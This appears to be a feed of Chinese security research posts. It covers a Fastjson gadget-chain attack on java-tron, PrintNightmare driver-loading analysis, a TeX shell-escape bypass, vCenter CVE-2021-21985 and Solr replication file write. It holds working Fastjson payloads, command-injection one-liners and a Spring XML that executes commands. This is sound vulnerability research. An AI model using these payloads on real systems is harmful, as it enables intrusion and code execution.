String payload_commons_io_filewrite_7_8 = "{\"x\":{\"@type\":\"com.alibaba.fastjson.JSONObject\",\"input\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\"reader\":{\"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\"charSequence\":{\"@type\":\"java.lang.String\"\""+aaa_8192+"\",\"start\":0,\"end\":2147483647},\"charsetName\":\"UTF-8\",\"bufferSize\":1024},\"branch\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\"writer\":{\"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\"file\":\""+write_name+"\",\"charsetName\":\"UTF-8\",\"append\": false},\"charsetName\":\"UTF-8\",\"bufferSize\": 1024,\"writeImmediately\": true},\"trigger\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\"inputStream\":{\"@type\":\"org.apache.commons.io.input.TeeInputStream\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"},\"trigger2\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\"inputStream\":{\"@type\":\"org.apache.commons.io.input.TeeInputStream\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"},\"trigger3\":{\"@type\":\"java.lang.AutoCloseable\",\"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\"inputStream\":{\"@type\":\"org.apache.commons.io.input.TeeInputStream\",\"input\":{\"$ref\":\"$.input\"},\"branch\":{\"$ref\":\"$.branch\"},\"closeBranch\": true},\"httpContentType\":\"text/xml\",\"lenient\":false,\"defaultEncoding\":\"UTF-8\"}}";

3.commons-io 逐字节读文件内容

String payload_read_file = "{\"abc\": {\"@type\": \"java.lang.AutoCloseable\",\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\"delegate\": {\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\"reader\": {\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\"url\": \"file:///D:/tmp/sss.txt\"},\"charsetName\": \"UTF-8\",\"bufferSize\": 1024},\"boms\": [{\"charsetName\": \"UTF-8\",\"bytes\": [11]}]},\"address\": {\"$ref\": \"$.abc.BOM\"}}";
6
7
8

四、New Gadgets 及实现区块链RCE

PPT中提到了,它没有mysql-jdbc链,且为Spring-boot,无法直接写webshell。虽然我们可以覆盖class文件,但是需要root权限,且并不确定charse.jar path。

然后回到目标本身,java tron是tron推出的公链协议的java实现,是一个开源 Java 应用程序,Java-tron 可以在 tron 节点上启用 HTTP 服务内部使用Fastjson解析Json数据。且:

• Leveldb 和 leveldbjni:

• 快速键值存储库

• 被比特币使用,因此被很多公链继承

• 存储区块链元数据,频繁轮询读写

• 需要效率,所以 JNI https://github.com/fusesource/leveldbjn

综上所述,洞主最终利用Fastjson的几个漏洞,结合Levaldbjni的JNI特性,替换/tmp/目录下的so文件最终执行了恶意命令

1.模拟环境 Levaldbjni_Sample

这里我们简单写了一个Levaldbjni的Demo来模拟漏洞环境,

两次执行factory.open(new File("/tmp/lvltest1"), options);都将会加载

/**
 * @auther Skay
 * @date 2021/8/10 19:35
 * @description
 */

import static org.fusesource.leveldbjni.JniDBFactory.factory;

import java.io.File;
import java.io.IOException;

import org.iq80.leveldb.DB;
import org.iq80.leveldb.Options;

public class Levaldbjni_Sample {
    public static void main(String[] args) throws IOException, InterruptedException {
        Options options = new Options();
        Thread.sleep(2000);
        options.createIfMissing(true);
        Thread.sleep(2000);
        DB db = factory.open(new File("/tmp/lvltest"), options);
        System.out.println("so file created");
        System.out.println("watting attack.......");
        Thread.sleep(30000);
        System.out.println("Exploit.......");
        DB db1 = factory.open(new File("/tmp/lvltest1"), options);

        try {
            for (int i = 0; i < 1000000; i++) {
                byte[] key = new String("key" + i).getBytes();
                byte[] value = new String("value" + i).getBytes();
                db.put(key, value);
            }
            for (int i = 0; i < 1000000; i++) {
                byte[] key = new String("key" + i).getBytes();
                byte[] value = db.get(key);
                String targetValue = "value" + i;
                if (!new String(value).equals(targetValue)) {
                    System.out.println("something wrong!");
                }
            }
            for (int i = 0; i < 1000000; i++) {
                byte[] key = new String("key" + i).getBytes();
                db.delete(key);
            }

            Thread.sleep(20000);
//            Thread.sleep(500000);
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            db.close();
        }
    }
}

运行时会在tmp目录下生成如下文件

9

可以看到我们的目标就是替换libleveldbjni-64-5950274583505954902.so

2.commons-io 逐字节读文件名

在议题中中对于commons-io的使用是读取/tmp/目录下的随机生成的so文件名,我们现在可以使用file协议读取文件内容了,这里我们使用netdoc协议读取文件名即可,因为是逐字节读取,我们写一个简单的循环判断即可

public static char fakeChar(char[] fileName){
    char[] fs=new char[fileName.length+1];
    System.arraycopy(fileName,0,fs,0,fileName.length);
    for (char i = 1; i <= 127; i++) {
        fs[fs.length-1]=i;
        String payload_read_file = "{\"abc\": {\"@type\": \"java.lang.AutoCloseable\",\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\"delegate\": {\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\"reader\": {\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\"url\": \"netdoc:///tmp/\"},\"charsetName\": \"utf-8\",\"bufferSize\": 1024},\"boms\": [{\"charsetName\": \"utf-8\",\"bytes\": ["+formatChars(fs)+"]}]},\"address\": {\"$ref\": \"$.abc.BOM\"}}";
        if (JSON.parse(payload_read_file).toString().indexOf("bOMCharsetName")>0){
            return i;
        }
    }
    return 0;
}

执行效果如下

10

3.so文件的修改

这里需要一点二进制的知识,首先确定下我们要修改哪个函数

11

修改如下即可

12
13

4.写二进制文件

commons-io的链只支持写文本文件,这里测试了一下,不进行base64编码进行单纯文本方式操作二进制文件写入文件前后会产生一些奇妙的变化

14

议题作者给出了写二进制文件的一条新链

233

在进行了base64编码后就不存在上述问题,这里感谢浅蓝师傅提供了一些构造帮助,最后此链构造如下:

/**
 * @auther Skay
 * @date 2021/8/13 14:25
 * @description
 */
public class payload_AspectJ_writefile {
    public static void write_so(String target_path){
        byte[] bom_buffer_bytes = readFileInBytesToString("./beichen.so");
        //写文本时要填充数据
//        String so_content = new String(bom_buffer_bytes);
//        for (int i=0;i<8192;i++){
//            so_content = so_content+"a";
//        }
//        String base64_so_content = Base64.getEncoder().encodeToString(so_content.getBytes());
        String base64_so_content = Base64.getEncoder().encodeToString(bom_buffer_bytes);
        byte[] big_bom_buffer_bytes = Base64.getDecoder().decode(base64_so_content);
//        byte[] big_bom_buffer_bytes = base64_so_content.getBytes();
        String payload = String.format("{\n" +
                "  \"@type\":\"java.lang.AutoCloseable\",\n" +
                "  \"@type\":\"org.apache.commons.io.input.BOMInputStream\",\n" +
                "  \"delegate\":{\n" +
                "    \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\n" +
                "    \"input\":{\n" +
                "      \"@type\": \"org.apache.commons.codec.binary.Base64InputStream\",\n" +
                "      \"in\":{\n" +
                "        \"@type\":\"org.apache.commons.io.input.CharSequenceInputStream\",\n" +
                "        \"charset\":\"utf-8\",\n" +
                "        \"bufferSize\": 1024,\n" +
                "        \"s\":{\"@type\":\"java.lang.String\"\"%1$s\"\n" +
                "      },\n" +
                "      \"doEncode\":false,\n" +
                "      \"lineLength\":1024,\n" +
                "      \"lineSeparator\":\"5ZWKCg==\",\n" +
                "      \"decodingPolicy\":0\n" +
                "    },\n" +
                "    \"branch\":{\n" +
                "      \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\",\n" +
                "      \"targetPath\":\"%2$s\"\n" +
                "    },\n" +
                "    \"closeBranch\":true\n" +
                "  },\n" +
                "  \"include\":true,\n" +
                "  \"boms\":[{\n" +
                "                  \"@type\": \"org.apache.commons.io.ByteOrderMark\",\n" +
                "                  \"charsetName\": \"UTF-8\",\n" +
                "                  \"bytes\":" +"%3$s\n" +
                "                }],\n" +
                "  \"x\":{\"$ref\":\"$.bOM\"}\n" +
                "}",base64_so_content, "D://java//Fastjson_All//fastjson_debug//fastjson_68_payload_test_attck//aaa.so",Arrays.toString(big_bom_buffer_bytes));
//        System.out.println(payload);
        JSON.parse(payload);

    }

    public static byte[] readFileInBytesToString(String filePath) {
        final int readArraySizePerRead = 4096;
        File file = new File(filePath);
        ArrayList<Byte> bytes = new ArrayList<>();
        try {
            if (file.exists()) {
                DataInputStream isr = new DataInputStream(new FileInputStream(
                        file));
                byte[] tempchars = new byte[readArraySizePerRead];
                int charsReadCount = 0;

                while ((charsReadCount = isr.read(tempchars)) != -1) {
                    for(int i = 0 ; i < charsReadCount ; i++){
                        bytes.add (tempchars[i]);
                    }
                }
                isr.close();
            }
        } catch (IOException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

        return toPrimitives(bytes.toArray(new Byte[0]));
    }

    static byte[] toPrimitives(Byte[] oBytes) {
        byte[] bytes = new byte[oBytes.length];

        for (int i = 0; i < oBytes.length; i++) {
            bytes[i] = oBytes[i];
        }

        return bytes;
    }
}

5.成功RCE

15

五、参考链接 & 致谢

*感谢voidfyoo、浅蓝、*RicterZ 在Fastjson Poc方面帮助

感谢Swing、Beichen 在二进制方面帮助

最后感谢郑成功不断督促和鼓励才使得这篇文章得以顺利展示到大家面前

https://www.mi1k7ea.com/2019/11/03/Fastjson%E7%B3%BB%E5%88%97%E4%B8%80%E2%80%94%E2%80%94%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%9F%BA%E6%9C%AC%E5%8E%9F%E7%90%86/

https://mp.weixin.qq.com/s/6fHJ7s6Xo4GEdEGpKFLOyg

http://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Xing-How-I-Use-A-JSON-Deserialization.pdf

对打印机服务漏洞 CVE-2021-1675 代码执行的验证过程

By: yyjb
30 June 2021 at 10:09

背景

本月的微软更新包含一个spool的打印机服务本地提权漏洞,自从去年cve-2020-1048被公开以来,似乎许多人开始关注到这一模块的漏洞。鉴于此这个漏洞刚公布出来时,并没有太仔细关注。直到后面关注到绿盟的微信公众号的演示视频,显示这个漏洞可能在域环境特定情况下执行任意代码。所以认为有必要对其原理以及适用范围情况进行分析。

补丁分析

通过补丁对比,可以确定该漏洞触发原理应该是一个在添加打印机驱动的过程中RpcAddPrinterDriverEx()绕过某些检查的漏洞。

根据API文档,RpcAddPrinterDriverEx API用于在打印机服务器上安装打印机驱动;第三个参数为dwFileCopyFlags,指定了服务器在拷贝驱动文件时的行为。文档给出了标志的可能值,结合补丁,我们发现了这样一个标志:APD_INSTALL_WARNED_DRIVER(0x8000),此标志允许服务器安装警告的打印机驱动,也就是说,如果在flag中设置了APD_INSTALL_WARNED_DRIVER,那么我们可以无视警告安装打印机驱动。这刚好是微软补丁试图限制的标志位。

本地提权

我们分析了添加驱动的内部实现(位于localspl.dll的InternalAddPrinterDriver函数),添加驱动的过程如下:

1. 检查驱动签名

2. 建立驱动文件列表

3. 检查驱动兼容性

4. 拷贝驱动文件

如果能够绕过其中的限制,将自己编写的dll复制到驱动目录并加载,就可以完成本地提权。

绕过对驱动文件签名的检查

绕过驱动签名检查的关键函数为ValidateDriverInfo()。分析该函数,我们发现,如果标志位设置了APD_INSTALL_WARNED_DRIVER(0x8000),那么函数会跳过驱动路径和驱动签名的检查。

绕过建立驱动文件目录函数

CreateInternalDriverFileArray()函数根据文件操作标志来决定是否检查spool驱动目录。如果a5 flag被标志为False,驱动加载函数只会检查用户目录中是否包含要拷贝的驱动文件;否则,函数会尝试到spool驱动目录寻找目标驱动,在本地提权场景下,这将导致列表建立失败。

通过简单分析可以发现,在FileCopyFlags中设置APD_COPY_FROM_DIRECTORY(0x10),即可跳过spool目录检查。

绕过驱动文件版本检查

后续的检查包括对需要添加的驱动的兼容性检查,这里主要是检查我们需要添加的驱动版本信息(这里主要是指版本号的第二位,我后面所描述的版本号都特指第二位):

下面是用来被当去打印驱动加载的我们自己生成的一个dll文件,

修改dll文件版本号绕过驱动文件兼容性检查:

驱动加载函数InternalAddPrinterDriver中的检查限制了驱动版号只能为0,1,3.

而兼容性检查的内部函数实现(ntprint.dll的PSetupIsCompatibleDriver函数)又限制了该版本号必须大于2。因此,可以修改待加载驱动或dll文件的版本号为3,从而绕过驱动兼容性检查。

驱动文件的复制加载

驱动文件拷贝函数(CopyFileToFinalDirectory)对参数没有额外的限制。函数执行完成后,我们的驱动文件以及依赖就被复制到驱动目录了,复制后的驱动文件会被自动加载。

自动加载驱动:

尝试远程执行代码。

目前,我们已经可以从本地指定的用户目录加载我们自定义的打印机驱动文件到spool驱动目录。之前我们对AddPrinterDriverExW函数的调用第一个参数为空,用来在本地加载。如果直接设置该参数为指定服务器地址,目标会返回我们需要登陆到目标设备的权限的错误。作为测试,我们先通过IPC连接到目标设备,之后再通过我们的驱动添加调用,使远程目标设备从其本地的指定目录复制驱动文件到spool驱动目录并加载。

但这里有一个问题,这个操作仅仅是让目标服务器从本地磁盘复制并加载驱动,在此之前,我们还要使我们自己的驱动文件从攻击机设备的目录上分发到目标设备上。

这里就必须要求目标开启对应的集群后台打印处理程序,之后再次调用AddPrinterDriverExW修改标志为APD_COPY_TO_ALL_SPOOLERS,将本地的驱动文件分发到目标设备磁盘上。

远程加载驱动

最后,我这里并没有使用实际的集群打印服务器的环境。作为测试,我预先复制了驱动文件到目标服务器的指定路径。调用AddPrinterDriverExW使远程目标服务器完成了复制用户目录驱动文件到驱动目录并以system权限加载的过程。

思路验证视频:

漏洞总结

该漏洞的核心是允许普通用户绕过检查,将一个任意未签名dll复制到驱动目录并以系统管理员权限加载起来。而该漏洞可以达到远程触发的效果,则是由于集群打印服务间可以远程分发接收打印驱动文件的特性。

所以就目前的漏洞验证结果来看,该漏洞的危害似乎可能比他的漏洞原理表现出来的要影响更多一点。除了作为本地提权的利用方式之外,如果在一些内部隔离办公环境,启用了这种集群打印服务又没有及时更新系统补丁,该漏洞的作用还是比较有威胁性的。

PrintNightmare 0day POC的补充说明

通过最近一两天其他研究人员的证明,目前公开的cube0x0/PrintNightmare poc可以对最新的补丁起作用。鉴于此,我们后续验证了这个原因。

通过分析,补丁函数中对调用来源做了检查,查询当前调用者token失败时,会强制删除掉APD_INSTALL_WARNED_DRIVER(0x8000)的驱动添加标志。从而导致验证不通过。

但是,当我们从远程调用到这个接口,至少目前证实的通过IPC连接到目标后,这里的调用者已经继承了所需要的token,从而绕过检查。

从某种意义上讲,该漏洞修复方案只针对本地提权场景进行了限制,而没有考虑到远程调用对漏洞的影响。

参考

https://mp.weixin.qq.com/s/MjLPFuFJobkDxaIowvta7A

http://218.94.103.156:8090/download/developer/xpsource/Win2K3/NT/public/internal/windows/inc/winsprlp.h

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b96cc497-59e5-4510-ab04-5484993b259b

https://github.com/cube0x0/CVE-2021-1675

TeX 安全模式绕过研究

By: RicterZ
6 June 2021 at 07:06

漏洞时间线:

  • 2021/03/08 - 提交漏洞至 TeX 官方;
  • 2021/03/27 - 漏洞修复,安全版本:TeX Live 2021;
  • 2021/06/06 - 漏洞分析公开。

I. Tex 安全限制概述

TeX 提供了 \write18 原语以执行命令。为了提高安全性,TexLive 的配置文件(texmf.cnf)提供了配置项(shell_escape、shell_escape_commands)去配置 \write18 能否执行命令以及允许执行的命令列表。

其中 shell_escape 有三种配置值,分别为:

  • f:不允许执行任何命令
  • t:允许执行任何命令
  • p:支持执行白名单内的命令(默认)

白名单命令列表可以通过如下命令查询:

kpsewhich --var-value shell_escape_commands

shell_escape 配置值可以通过如下命令查询:

kpsewhich --var-value shell_escape

本文涉及的 CVE 如下:没 advisory 懒得申请了。

II. 挖掘思路

TeX 提供了一个默认的白名单命令列表,如若在调用过程中,这些命令出现安全问题,则会导致 TeX 本身在调用命令的时候出现相同的安全问题。

可以假设:在命令调用的过程中,由于开发者对于命令参数的不完全掌握,有可能存在某个命令参数最终会作为系统命令进行调用的情况。依据这个思路,挖掘白名单内的命令以及白名单内命令的内部调用,并最终得到一个调用链以及相关的参数列表,依据研究人员的经验去判断是否存在安全问题。

III. 在 *nix 下的利用方式

通过针对命令的深入挖掘,发现白名单内的 repstopdf 命令存在安全问题,通过精心构造参数可以执行任意系统命令。

repstopdf 意为 restricted epstopdf,epstopdf 是一个 Perl 开发的脚本程序,可以将 eps 文件转化为 pdf 文件。repstopdf 强制开启了 epstopdf 的 --safer 参数,同时禁用了 --gsopt/--gsopts/--gscmd 等 GhostScript 相关的危险参数,以防止在 TeX 中调用此命令出现安全问题。repstopdf 调用方式如下:

repstopdf [options] [epsfile [pdffile.pdf]]

repstopdf 会调用 GhostScript 去生成 pdf 文件(具体调用参数可以用过 strace 命令进行跟踪),其中传入的 epsfile 参数会成为 GhostScript 的 -sOutputFile= 选项的参数。

通过查阅 GhostScript 的文档可知,GhostScript 的此项参数支持管道操作。当我们传入文件名为:|id 时,GhostScript 会执行 id 命令。于是我们可以构造 repstopdf 的参数实现任意的命令执行操作,不受前文所提及的限制条件限制。利用方式如下所示:

repstopdf '|id #'

在 TeX 内的利用方式为:

\write18{repstopdf "|id #"}

IV. 在 Windows 下的利用方式

Windows 平台下,白名单内存在的是 epstopdf 而非 repstopdf,且相关参数选项与 *nix 平台下不相同,但仍旧存在 --gsopt 选项。利用此选项可以控制调用 GhostScript 时的参数。

此参数只支持设定调用 GhostScript 时的参数选项。参考 GhostScript 的文档,指定参数 -sOutputFile 及其他相关参数即可。利用方式为:

epstopdf 1.tex "--gsopt=-sOutputFile=%pipe%calc" "--gsopt=-sDEVICE=pdfwrite" "--gsopt=-"

V. LuaLaTeX 的安全问题

LuaLaTex 内置了 Lua 解释器,可以在编译时执行 Lua 代码,原语为:\directlua。LuaLaTeX 支持调用系统命令,但是同样地受到 shell_escape 的限制。如在受限(f)模式下,不允许执行任意命令;默认情况下只允许执行白名单内的命令。由于可以调用白名单内的命令,LuaLaTeX 同样可以利用 III、IV 内描述的方式进行利用,在此不做进一步赘述。

LuaLaTeX 的 Lua 解释器支持如下风险功能:

  • 命令执行(io.popen 等函数)
  • 文件操作(lfs 库函数)
  • 环境变量设置(os.setenv)
  • 内置了部分自研库(fontloader)

1. 环境变量劫持导致命令执行

通过修改 PATH 环境变量,可以达到劫持白名单内命令的效果。PATH 环境变量指定了可执行文件所在位置的目录路径,当在终端或者命令行输入命令时,系统会依次查找 PATH 变量中指定的目录路径,如果该命令存在与目录中,则执行此命令(https://en.wikipedia.org/wiki/PATH_(variable))。

将 PATH 变量修改为攻击者可控的目录,并在该目录下创建与白名单内命令同名的恶意二进制文件后,攻击者通过正常系统功能调用白名单内的命令后,可以达到任意命令执行的效果。

2. fontloader 库安全问题

fontloader 库存在典型的命令注入问题,问题代码如下:

// texk/web2c/luatexdir/luafontloader/fontforge/fontforge/splinefont.c
char *Decompress(char *name, int compression) {
    char *dir = getenv("TMPDIR");
    char buf[1500];
    char *tmpfile;

    if ( dir==NULL ) dir = P_tmpdir;
    tmpfile = galloc(strlen(dir)+strlen(GFileNameTail(name))+2);
    strcpy(tmpfile,dir);
    strcat(tmpfile,"/");
    strcat(tmpfile,GFileNameTail(name));
    *strrchr(tmpfile,'.') = '\0';
#if defined( _NO_SNPRINTF ) || defined( __VMS )
    sprintf( buf, "%s < %s > %s", compressors[compression].decomp, name, tmpfile );
#else
    snprintf( buf, sizeof(buf), "%s < %s > %s", compressors[compression].decomp, name, tmpfile );
#endif
    if ( system(buf)==0 )
return( tmpfile );
    free(tmpfile);
return( NULL );
}

调用链为:

ff_open -> ReadSplineFont -> _ReadSplineFont -> Decompress -> system

通过 Lua 调用 fontloader.open 函数即可触发。此方式可以在受限(f)模式下执行命令。

VI. DVI 的安全问题

DVI(Device independent file)是一种二进制文件格式,可以由 TeX 生成。在 TeX 中,可以利用 \special 原语嵌入图形。TeX 内置了 DVI 查看器,其中 *nix 平台下为 xdvi 命令,Windows 平台下通常为 YAP(Yet Another Previewer)。

1. xdvi 命令的安全问题

xdvi 在处理超链接时,调用了系统命令启动新的 xdvi,存在典型的命令注入问题。问题代码如下:

// texk/xdvik/hypertex.c
void
launch_xdvi(const char *filename, const char *anchor_name)
{
#define ARG_LEN 32
    int i = 0;
    const char *argv[ARG_LEN];
    char *shrink_arg = NULL;

    ASSERT(filename != NULL, "filename argument to launch_xdvi() mustn't be NULL");

    argv[i++] = kpse_invocation_name;
    argv[i++] = "-name";
    argv[i++] = "xdvi";

    /* start the new instance with the same debug flags as the current instance */
    if (globals.debug != 0) {
	argv[i++] = "-debug";
	argv[i++] = resource.debug_arg;
    }
    
    if (anchor_name != NULL) {
	argv[i++] = "-anchorposition";
	argv[i++] = anchor_name;
    }

    argv[i++] = "-s";
    shrink_arg = XMALLOC(shrink_arg, LENGTH_OF_INT + 1);
    sprintf(shrink_arg, "%d", currwin.shrinkfactor);
    argv[i++] = shrink_arg;

    argv[i++] = filename; /* FIXME */
    
    argv[i++] = NULL;
    
...
	    execvp(argv[0], (char **)argv);

2. YAP 安全问题

YAP 在处理 DVI 内置的 PostScripts 脚本时调用了 GhostScript,且未开启安全模式(-dSAFER),可以直接利用内嵌的 GhostScript 进行命令执行。

VII. 漏洞利用

TeX 底层出现安全问题时,可以影响基于 TeX 的相关在线平台、TeX 编辑器以及命令行。下面以 MacOS 下比较知名的 Texpad 进行演示:

VIII. 参考文章

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析

By: RicterZ
5 June 2021 at 00:17
vSphere vCenter Server 的 vsphere-ui 基于 OSGi 框架,包含上百个 bundle。前几日爆出的任意文件写入漏洞即为 vrops 相关的 bundle 出现的问题。在针对其他 bundle 审计的过程中,发现 h5-vsan 相关的 bundle 提供了一些 API 端点,并且未经过授权即可访问。通过进一步的利用,发现其中某个端点存在安全问题,可以执行任意 Spring Bean 的方法,从而导致命令执行。
CVE-2021-21985 vCenter Server 远程代码执行漏洞分析

漏洞时间线:

  • 2021/04/13 - 发现漏洞并实现 RCE;
  • 2021/04/16 - 提交漏洞至 VMware 官方并获得回复;
  • 2021/05/26 - VMware 发布漏洞 Advisory(VMSA-2021-0010);
  • 2021/06/02 - Exploit 公开(from 随风's blog);
  • 2021/06/05 - 本文公开。

0x01. 漏洞分析

存在漏洞的 API 端点如下:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 1. 存在漏洞的 Controller

首先在请求路径中获取 Bean 名称或者类名和方法名称,接着从 POST 数据中获取 methodInput 列表作为方法参数,接着进入 invokeService 方法:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 2. invokeService 方法

invokeServer 先获取了 Bean 实例,接着获取该实例的方法列表,比对方法名和方法参数长度后,将用户传入的参数进行了一个简单的反序列化后利用进行了调用。Bean 非常多(根据版本不同数量有微量变化),如图所示:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 3. Bean 列表

其中不乏存在危险方法、可以利用的 Bean,需要跟进其方法实现进行排查。本文中的 PoC 所使用的 Bean 是 vmodlContext,对应的类是 com.vmware.vim.vmomi.core.types.impl.VmodContextImpl,其中的 loadVmodlPackage 方法代码如下:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 4. loadVmodlPackage 方法

注意到 loadVmodlPackage 会调用 SpringContextLoader 进行加载,vmodPackage 可控。

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 5. 调用 SpringContextLoader

最终会调用到 ClassPathXmlApplicationContext 的构造方法。ClassPathXmlApplicationContext 可以指定一个 XML 文件路径,Spring 会解析 XML 的内容,造成 SpEL 注入,从而实现执行任意代码。

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 6. ClassPathXmlApplicationContext

需要注意的是,在 SpringContextLoadergetContextFileNameForPackage 会将路径中的 . 替换为 /,所以无法指定一个正常的 IPv4 地址,但是可以利用数字型 IP 绕过:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 7. 调用 loadVmodlPackages 方法并传入 URL

XML 文件内容及攻击效果如下:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 8. XML 文件内容及攻击效果

0x02. 不出网利用(6.7 / 7.0)

若要利用此漏洞本质上需要获取一个 XML 文件的内容,而 Java 的 URL 并不支持 data 协议,那么需要返回内容可控的 SSRF 或者文件上传漏洞。这里利用的是返回内容可控的 SSRF 漏洞。漏洞位于 vSAN Health 组件中的 VsanHttpProvider.py:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 9. VsanHttpProvider.py 文件内容

这里存在一个 SSRF 漏洞,使用的是 Python 的 urlopen 函数进行请求,接着将返回内容在内存中进行解压,并且匹配文件名为 .*offline_bundle.* 的内容并进行返回。Python 的 urlopen 支持 data 协议,所以可以构造一个压缩包并 Base64 编码,构造 data 协议的 URL:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 10. 利用 SSRF 返回可控文件内容

在利用的过程中,将 IP 地址替换为 localhost 即可防止 . 被替换。由于这个端点在 6.5 版本的 vSAN Health 不存在,所以无法在 6.5 版本上不出网利用。

现在虽然不用进行外网请求,但是仍然无法获取命令回显。通过查看 Bean 列表,发现存在名为 systemProperties 的 Bean。同时这个 Bean 也存在方法可以获取属性内容:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 11. 调用 systemProperties 的方法

所以在执行 SpEL 时,可以将命令暂存到 systemProperties 中,然后利用 getProperty 方法获取回显。最终的 context.xml 内容为:

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
          <list>
            <value>/bin/bash</value>
            <value>-c</value>
            <value><![CDATA[ ls -la /  2>&1 ]]></value>
          </list>
        </constructor-arg>
    </bean>
    <bean id="is" class="java.io.InputStreamReader">
        <constructor-arg>
            <value>#{pb.start().getInputStream()}</value>
        </constructor-arg>
    </bean>
    <bean id="br" class="java.io.BufferedReader">
        <constructor-arg>
            <value>#{is}</value>
        </constructor-arg>
    </bean>
    <bean id="collectors" class="java.util.stream.Collectors"></bean>
    <bean id="system" class="java.lang.System">
        <property name="whatever" value="#{ system.setProperty(&quot;output&quot;, br.lines().collect(collectors.joining(&quot;\n&quot;))) }"/>
    </bean>
</beans>

最终利用需要两个 HTTP 请求进行。第一个请求利用 h5-vsan 组件的 SSRF 去请求本地的 vSAN Health 组件,触发第二个 SSRF 漏洞从而返回内容可控的 XML 文件内容,XML 文件会执行命令并存入 System Properties 中,第二个请求调用 systemProperties Bean 的 getProperty 方法获取输出。最终攻击效果如下:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 12. 不出网攻击效果

0x03. 技术总结

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

By: RicterZ
2 June 2021 at 09:10
Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

0x01. TL; DR

事情要从 Skay 的 SSRF 漏洞(CVE-2021-27905)说起。正巧后续的工作中遇到了 Solr,我就接着这个漏洞进行了进一步的分析。漏洞原因是在于 Solr 主从复制(Replication)时,可以传入任意 URL,而 Solr 会针对此 URL 进行请求。

说起主从复制,那么对于 Redis 主从复制漏洞比较熟悉的人会知道,可以利用主从复制的功能实现任意文件写入,那么 Solr 是否会存在这个问题呢?通过进一步的分析,我发现这个漏洞岂止于 SSRF,简直就是 Redis Replication 文件写入的翻版,通过构造合法的返回,可以以 Solr 应用的权限实现任意文件写。

对于低版本 Solr,可以通过写入 JSP 文件获取 Webshell,对于高版本 Solr,则需要结合用户权限,写入 crontab 或者 authorized_keys 文件利用。

0x02. CVE-2021-27905

Solr 的 ReplicationHandler 在传入 command 为 fetchindex 时,会请求传入的 masterUrl,漏洞点如下:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

SSRF 漏洞到这里就结束了。那么后续呢,如果是正常的主从复制,又会经历怎么样的过程?

0x03. Replication 代码分析

我们继续跟进 doFetch 方法,发现会调用到 fetchLatestIndex 方法:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

在此方法中,首先去请求目标 URL 的 Solr 实例,接着对于返回值的 indexversiongeneration 进行判断:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

如果全部合法(参加下图的 if 条件),则继续请求服务,获取文件列表:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

文件列表包含filelistconfFilestlogFiles 三部分,如果目标 Solr 实例返回的文件列表不为空,则将文件列表中的内容添加到 filesToDownload 中。这里 Solr 是调用的 command 是 filelist

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

获取下载文件的列表后,接着 Solr 会进行文件的下载操作,按照 filesToDownloadtlogFilesToDownloadconfFilesToDownload 的顺序进行下载。

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

我们随意跟进某个下载方法,比如 downloadConfFiles

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

可以发现,saveAs 变量是取于 files 的某个属性,而最终会直接创建一个 File 对象:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

也就是说,如果 file 的 alias 或者 name 可控,则可以利用 ../ 进行目录遍历,造成任意文件写入的效果。再回到 fetchFileList 查看,可以发现,filesToDownload 是完全从目标 Solr 实例的返回中获取的,也就是说是完全可控的。

